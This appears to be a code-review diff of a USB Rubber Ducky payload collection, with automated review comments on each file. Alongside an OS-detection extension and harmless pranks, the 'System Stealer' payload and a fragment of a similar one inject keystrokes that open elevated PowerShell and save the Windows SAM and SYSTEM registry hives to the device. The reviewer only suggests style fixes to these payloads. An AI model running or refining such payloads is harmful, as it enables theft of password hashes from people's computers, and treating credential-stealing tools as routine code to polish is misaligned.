$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE)
|
||||||
|
CAPSLOCK
|
||||||
|
END_IF
|
||||||
|
GUI d
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 800
|
||||||
|
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
|
||||||
|
GUI d
|
||||||
|
WAIT_FOR_CAPS_ON
|
||||||
|
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < #numBlinks )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
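Review bot: `IF ($_CAPSLOCK_ON == TRUE)` has no `THEN`, unlike the `IF` lines inside the extension block; add it so the file uses one form. The closing `REM` speaks of "downloading" SAM and SYSTEM, but `reg save` writes registry hives to the storage volume; reword the comment. `$_OS` is set by the extension and never checked before the Windows-only keystrokes.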
@ -0,0 +1,74 @@
|
||||||
|
REM TITLE System Stealer
|
||||||
|
REM AUTHOR mavisinator30001
|
||||||
|
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||||
|
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||||
|
REM DISCLAIMER This is for educational purposes ONLY
|
||||||
|
DELAY 1000
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
REM Change $DRIVELABEL to the storage label of your duck
|
||||||
|
DEFINE #DRIVELABEL DUCKY
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRING powershell
|
||||||
|
DELAY 1000
|
||||||
|
CTRL-SHIFT-ENTER
|
||||||
|
DELAY 750
|
||||||
|
LEFT
|
||||||
|
ENTER
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||||
|
WAIT_FOR_STORAGE_ACTIVITY
|
||||||
|
WAIT_FOR_STORAGE_INACTIVITY
|
||||||
|
ALT F4
|
||||||
|
ELSE
|
||||||
|
ATTACKMODE OFF
|
||||||
|
STOP_PAYLOAD
|
||||||
|
END_IF
|
|
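Review bot: `REM Change $DRIVELABEL to the storage label of your duck` names a variable that does not exist; the setting is `DEFINE #DRIVELABEL DUCKY` on the next line. The DESCRIPTION's "encrypted system information" should say that the SAM and SYSTEM registry hives are saved with `reg save`. This file overlaps with the "Exfiltrate NTLM Hash" payload in the same change set; consider keeping one and documenting it properly. The DEFINE also sits after the extension, away from the header where the other payloads keep their settings.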
@ -0,0 +1,5 @@
|
||||||
|
## 1 Script to Rule Them All
|
||||||
|
|
||||||
|
The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
|
||||||
|
|
||||||
|
It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.
|
|
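Review bot: "the two extensions" are never named, and the README mentions neither `DETECT_OS_UBER()` nor the `$_OS` values the payload sets. Name the extensions this is derived from and add a short usage line, so the README can be read without opening the payload.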
@ -0,0 +1,293 @@
|
||||||
|
REM Title: One Script To Rule Them All
|
||||||
|
REM Author: Korben and UberGuidoZ
|
||||||
|
REM Description: Attempt to detect OS then run conditional code based on result.
|
||||||
|
REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
|
||||||
|
REM Version: 1.6
|
||||||
|
REM Category: All of them
|
||||||
|
REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
|
||||||
|
|
||||||
|
EXTENSION OS_DETECTION_UBER
|
||||||
|
REM VERSION 2.0
|
||||||
|
REM AUTHOR: Korben and UberGuidoZ
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USB Rubber Ducky Host OS Detection (moving target, may fall)
|
||||||
|
Results may vary greatly depending on a combination of many variables:
|
||||||
|
- number of testing stages
|
||||||
|
- specific devices and versions tested against
|
||||||
|
- number of systems testing for (scope)
|
||||||
|
- detection techniques (passive/invisible/active/hybrid)
|
||||||
|
- overall speed
|
||||||
|
- overall accuracy
|
||||||
|
|
||||||
|
If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
|
||||||
|
|
||||||
|
TARGET:
|
||||||
|
DEFAULT - Windows, Mac, Linux
|
||||||
|
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Call DETECT_OS_UBER() anywhere in your payload after the extension.
|
||||||
|
Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
|
||||||
|
|
||||||
|
FEEDBACK:
|
||||||
|
As mentioned above, this a moving target (especially for macOS).
|
||||||
|
Please report any issues identifying specific operating systems with as much detail as possible.
|
||||||
|
Your feedback will greatly help solidify the robustness of this extension and others based on it.
|
||||||
|
|
||||||
|
DEBUGGING:
|
||||||
|
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION
|
||||||
|
|
||||||
|
REM For Debugging (use if troubleshooting or reporting issues):
|
||||||
|
DEFINE #DEBUGGING_OUTPUT FALSE
|
||||||
|
DEFINE #ADVANCED_DETECTION FALSE
|
||||||
|
|
||||||
|
REM Timing fine tuning:
|
||||||
|
DEFINE #STARTUP_DELAY 1500
|
||||||
|
DEFINE #RESTART_WAIT 1000
|
||||||
|
DEFINE #EXECUTE_DELAY 2000
|
||||||
|
DEFINE #CONNECT_WAIT 1000
|
||||||
|
DEFINE #OS_DETECT_MODE HID
|
||||||
|
REM Define Apple keyboard to keep macOS happy
|
||||||
|
DEFINE #OS_DETECT_VID VID_05AC
|
||||||
|
DEFINE #OS_DETECT_PID PID_021E
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #HOST_RESPONSE_TIMEOUT 1000
|
||||||
|
|
||||||
|
REM Start DETECT_OS function
|
||||||
|
FUNCTION DETECT_OS_UBER()
|
||||||
|
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
|
||||||
|
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||||
|
DELAY #STARTUP_DELAY
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
|
||||||
|
REM Debugging if TRUE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||||
|
STRING ADVANCED OS DETECT
|
||||||
|
ELSE_DEFINED
|
||||||
|
STRING OS DETECT
|
||||||
|
END_IF_DEFINED
|
||||||
|
ENTER
|
||||||
|
STRING test caps
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
IF ($_CAPSLOCK_ON == FALSE) THEN
|
||||||
|
LED_R
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
|
END_IF
|
||||||
|
LED_OFF
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING test done
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING received led response
|
||||||
|
END_IF_DEFINED
|
||||||
|
LED_G
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: Windows
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = WINDOWS
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: Linux
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = LINUX
|
||||||
|
END_IF
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No LED response
|
||||||
|
ENTER
|
||||||
|
STRING Prediciton: MacOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = MACOS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||||
|
IF ( $_OS == LINUX ) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Soft reconnect
|
||||||
|
END_IF_DEFINED
|
||||||
|
ATTACKMODE OFF
|
||||||
|
DELAY #RESTART_WAIT
|
||||||
|
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||||
|
DELAY #CONNECT_WAIT
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Reconnected
|
||||||
|
END_IF_DEFINED
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Caps LED on
|
||||||
|
ENTER
|
||||||
|
STRING Test numlock
|
||||||
|
END_IF_DEFINED
|
||||||
|
NUMLOCK
|
||||||
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Test done
|
||||||
|
END_IF_DEFINED
|
||||||
|
IF ($_NUMLOCK_ON == FALSE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No numlock LED
|
||||||
|
ENTER
|
||||||
|
STRING Prediciton: ChromeOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = CHROMEOS
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Numlock LED on
|
||||||
|
ENTER
|
||||||
|
STRING Testing scrolllock
|
||||||
|
END_IF_DEFINED
|
||||||
|
SCROLLLOCK
|
||||||
|
DELAY #HOST_RESPONSE_TIMEOUT
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Test done
|
||||||
|
END_IF_DEFINED
|
||||||
|
IF ($_SCROLLLOCK_ON == TRUE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Scrolllock LED on
|
||||||
|
ENTER
|
||||||
|
STRING Prediciton: Android
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = ANDROID
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No scrolllock reply
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: Linux
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = LINUX
|
||||||
|
END_IF
|
||||||
|
END_IF
|
||||||
|
END_IF
|
||||||
|
ELSE IF ($_OS == MACOS) THEN
|
||||||
|
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Caps LED on
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: iOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = IOS
|
||||||
|
ELSE
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING No caps reply
|
||||||
|
ENTER
|
||||||
|
STRING Prediction: MacOS
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = MACOS
|
||||||
|
END_IF
|
||||||
|
ELSE IF ($_OS == WINDOWS) THEN
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING Confident Windows Prediction
|
||||||
|
END_IF_DEFINED
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
END_IF_DEFINED
|
||||||
|
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
|
||||||
|
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||||
|
ENTER
|
||||||
|
STRING OS_DETECT complete
|
||||||
|
ENTER
|
||||||
|
END_IF_DEFINED
|
||||||
|
END_FUNCTION
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
EXTENSION HELLO_OS_UBER
|
||||||
|
REM VERSION 2.0
|
||||||
|
REM AUTHOR: Korben and UberGuidoZ
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
|
||||||
|
after DETECT_OS_UBER() prints the OS determination. Make sure
|
||||||
|
your custom conditional code is inserted below where commented.
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM Defining custom $_OS enums if desired
|
||||||
|
DEFINE #EXTRA_EXAMPLES FALSE
|
||||||
|
DEFINE #SOME_OTHER_OS 6
|
||||||
|
DEFINE #ANOTHER_OS 7
|
||||||
|
|
||||||
|
FUNCTION HELLO_OS_UBER()
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
REM Windows code starts here
|
||||||
|
DELAY 1000
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN notepad
|
||||||
|
DELAY 1000
|
||||||
|
STRINGLN Legit DS3 on Windows
|
||||||
|
REM Windows code ends here
|
||||||
|
ELSE IF ($_OS == MACOS) THEN
|
||||||
|
REM macOS code starts here
|
||||||
|
DELAY 2000
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN TextEdit
|
||||||
|
STRINGLN Legit DS3 on macOS
|
||||||
|
REM macOS code ends here
|
||||||
|
ELSE IF ($_OS == LINUX) THEN
|
||||||
|
REM Linux code starts here
|
||||||
|
DELAY 2000
|
||||||
|
CTRL ALT t
|
||||||
|
DELAY 100
|
||||||
|
STRINGLN nano
|
||||||
|
STRINGLN Legit DS3 on Linux
|
||||||
|
REM Linux code ends here
|
||||||
|
ELSE IF ($_OS == IOS) THEN
|
||||||
|
REM iOS code starts here
|
||||||
|
REM iOS code ends here
|
||||||
|
ELSE IF ($_OS == CHROMEOS) THEN
|
||||||
|
REM ChromeOS code starts here
|
||||||
|
REM ChromeOS code ends here
|
||||||
|
ELSE IF ($_OS == ANDROID) THEN
|
||||||
|
REM Android code starts here
|
||||||
|
REM Android code ends here
|
||||||
|
IF_DEFINED_TRUE #EXTRA_EXAMPLES
|
||||||
|
ELSE IF($_OS == #SOME_OTHER_OS) THEN
|
||||||
|
REM Custom Other OS code starts here
|
||||||
|
REM Custom Other OS code ends here
|
||||||
|
ELSE IF($_OS == #ANOTHER_OS) THEN
|
||||||
|
REM Another custom Other OS code starts here
|
||||||
|
REM Another custom Other OS code ends here
|
||||||
|
END_IF_DEFINED
|
||||||
|
ELSE
|
||||||
|
REM All else fails code starts here
|
||||||
|
REM All else fails code ends here
|
||||||
|
END_IF
|
||||||
|
END_FUNCTION
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Do the do! Change delay at beginning if desired.
|
||||||
|
|
||||||
|
DETECT_OS_UBER()
|
||||||
|
DELAY #EXECUTE_DELAY
|
||||||
|
HELLO_OS_UBER()
|
|
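Review bot: In HELLO_OS_UBER() the macOS and Linux branches have no DELAY between launching the editor and typing into it: `STRINGLN TextEdit` and `STRINGLN nano` are each followed directly by the `Legit DS3 on ...` line, while the Windows branch waits `DELAY 1000` after `STRINGLN notepad`. Add a comparable DELAY after the launch line in both branches, and consider raising the `DELAY 100` after `CTRL ALT t`, so the text does not land in the launcher or the shell before the editor has focus. Smaller points: the debug strings spell "Prediciton" in the MacOS, ChromeOS and Android branches, the USAGE text reads "OS_DETECTION_UBERExtension" without a space, and the `$_OS = WINDOWS` assignment inside `ELSE IF ($_OS == WINDOWS)` is redundant.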
@ -0,0 +1,66 @@
|
||||||
|
# Create RickRoll Contact - iOS
|
||||||
|
|
||||||
|
This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Create RickRoll Contact
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: iOS devices
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
|
||||||
|
|
||||||
|
```
|
||||||
|
DEFINE #CONTACTS-APP-NAME Contacts
|
||||||
|
DEFINE #CONTACT-NAME Ricky
|
||||||
|
DEFINE #CONTACT-LAST-NAME Astley
|
||||||
|
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
|
||||||
|
```
|
||||||
|
|
||||||
|
- Other optional DEFINEs
|
||||||
|
|
||||||
|
```
|
||||||
|
DEFINE #CONTACT-COMPANY example
|
||||||
|
DEFINE #CONTACT-E-MAIL example
|
||||||
|
DEFINE #CONTACT-WEBSITE-URL example
|
||||||
|
DEFINE #CONTACT-BIRTHDAY example
|
||||||
|
DEFINE #CONTACT-STREET example
|
||||||
|
DEFINE #CONTACT-CITY example
|
||||||
|
DEFINE #CONTACT-STATE example
|
||||||
|
DEFINE #CONTACT-ZIP example
|
||||||
|
DEFINE #CONTACT-COUNTRY example
|
||||||
|
```
|
||||||
|
|
||||||
|
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
|
||||||
|
|
||||||
|
If you want to remove the zip contact info, you should change this one piece of code from this...
|
||||||
|
|
||||||
|
```
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
```
|
||||||
|
|
||||||
|
... to this...
|
||||||
|
|
||||||
|
```
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
REM STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
```
|
||||||
|
|
||||||
|
In this way you are going to ignore this step but without altering the proper flow of available information.
|
||||||
|
|
||||||
|
### How It Works
|
||||||
|
|
||||||
|
1. Sets a user-defined options.
|
||||||
|
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
|
||||||
|
3. After readiness is confirmed, the script:
|
||||||
|
- Runs commands to open **Contacts**.
|
||||||
|
- Executes some commands to sets the new contact information
|
|
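Review bot: The "Dependencies" section of this README lists configuration DEFINEs rather than anything the payload depends on, and its first bullet ("We believe that these 4 pieces of information are critical...") does not say that the four DEFINEs below it are the mandatory ones. Rename the section (for example "Configuration") and label the two code blocks as mandatory and optional, matching the `START MANDATORY DEFINEs` / `START OPTIONAL DEFINEs` comments in the payload. Typos to fix in the same pass: "istance", "littebit", "Sets a user-defined options", "commands to sets". The How It Works list also stops at opening Contacts and filling fields; it should mention the final step the payload performs.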
@ -0,0 +1,135 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Create RickRoll Contact #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : iOS #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM @@@ START MANDATORY DEFINEs @@@
|
||||||
|
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
|
||||||
|
|
||||||
|
DEFINE #CONTACTS-APP-NAME Contacts
|
||||||
|
DEFINE #CONTACT-NAME Ricky
|
||||||
|
DEFINE #CONTACT-LAST-NAME Astley
|
||||||
|
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
|
||||||
|
|
||||||
|
REM @@@ START OPTIONAL DEFINEs @@@
|
||||||
|
|
||||||
|
DEFINE #CONTACT-COMPANY example
|
||||||
|
DEFINE #CONTACT-E-MAIL example
|
||||||
|
DEFINE #CONTACT-WEBSITE-URL example
|
||||||
|
DEFINE #CONTACT-BIRTHDAY example
|
||||||
|
DEFINE #CONTACT-STREET example
|
||||||
|
DEFINE #CONTACT-CITY example
|
||||||
|
DEFINE #CONTACT-STATE example
|
||||||
|
DEFINE #CONTACT-ZIP example
|
||||||
|
DEFINE #CONTACT-COUNTRY example
|
||||||
|
|
||||||
|
REM @@@ START PAYLOAD @@@
|
||||||
|
|
||||||
|
EXTENSION DETECT_READY
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
|
||||||
|
TARGETS:
|
||||||
|
Any system that reflects CAPSLOCK will detect minimum required delay
|
||||||
|
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #RESPONSE_DELAY 25
|
||||||
|
DEFINE #ITERATION_LIMIT 120
|
||||||
|
|
||||||
|
VAR $C = 0
|
||||||
|
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
|
||||||
|
CAPSLOCK
|
||||||
|
DELAY #RESPONSE_DELAY
|
||||||
|
$C = ($C + 1)
|
||||||
|
END_WHILE
|
||||||
|
CAPSLOCK
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
|
||||||
|
DELAY 200
|
||||||
|
|
||||||
|
GUI SPACE
|
||||||
|
DELAY 250
|
||||||
|
STRINGLN #CONTACTS-APP-NAME
|
||||||
|
DELAY 500
|
||||||
|
GUI n
|
||||||
|
|
||||||
|
REM name
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-NAME
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM last name
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-LAST-NAME
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM company
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-COMPANY
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM phone number
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-PHONE-NUMBER
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM mail
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-E-MAIL
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM url
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-WEBSITE-URL
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM birthday
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-BIRTHDAY
|
||||||
|
TAB
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM street
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-STREET
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM city
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-CITY
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM state
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-STATE
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM zip
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-ZIP
|
||||||
|
TAB
|
||||||
|
|
||||||
|
REM country/region
|
||||||
|
DELAY 250
|
||||||
|
STRING #CONTACT-COUNTRY
|
||||||
|
TAB
|
||||||
|
GUI q
|
|
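Review bot: The payload ends with `STRING #CONTACT-COUNTRY`, `TAB`, `GUI q` with no DELAY and no explicit confirm step before quitting, so whether the new contact is actually saved depends on how the Contacts app treats an open draft on quit. Add a short DELAY and the confirming keystroke before `GUI q`, or a REM stating that quitting commits the entry. Two documentation gaps: the optional DEFINEs all default to `example`, which will be typed literally into every field unless edited, and the phone, mail, url and birthday blocks send two TABs where the others send one, with no comment explaining the form layout that requires it.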
@ -3,10 +3,10 @@ REM Title: Hacker Typer
|
||||||
REM Author: UberGuidoZ
|
REM Author: UberGuidoZ
|
||||||
REM Description: Opens a harmless website and types like a hacker
|
REM Description: Opens a harmless website and types like a hacker
|
||||||
REM Target: Windows but easily modified to work on any OS with a browser
|
REM Target: Windows but easily modified to work on any OS with a browser
|
||||||
REM Version: 1.0
|
REM Version: 1.1
|
||||||
REM Category: Prank
|
REM Category: Prank
|
||||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||||
REM
|
ATTACKMODE HID STORAGE
|
||||||
DELAY 1500
|
DELAY 1500
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
|
|
|
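Review bot: The new `ATTACKMODE HID STORAGE` line replaces the blank `REM` separator without any explanation of why storage mode is needed; nothing in the visible lines (`DELAY 1500`, `GUI r`, `DELAY 1000`) uses it, and the Description still says the payload only opens a website and types. Either state the reason in the header, or request only the mode the payload uses. Keep a blank `REM` between the header block and the first command so the metadata stays visually separate, and note what changed for the 1.0 to 1.1 bump.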
@ -0,0 +1,5 @@
|
||||||
|
# Resolution Prank
|
||||||
|
|
||||||
|
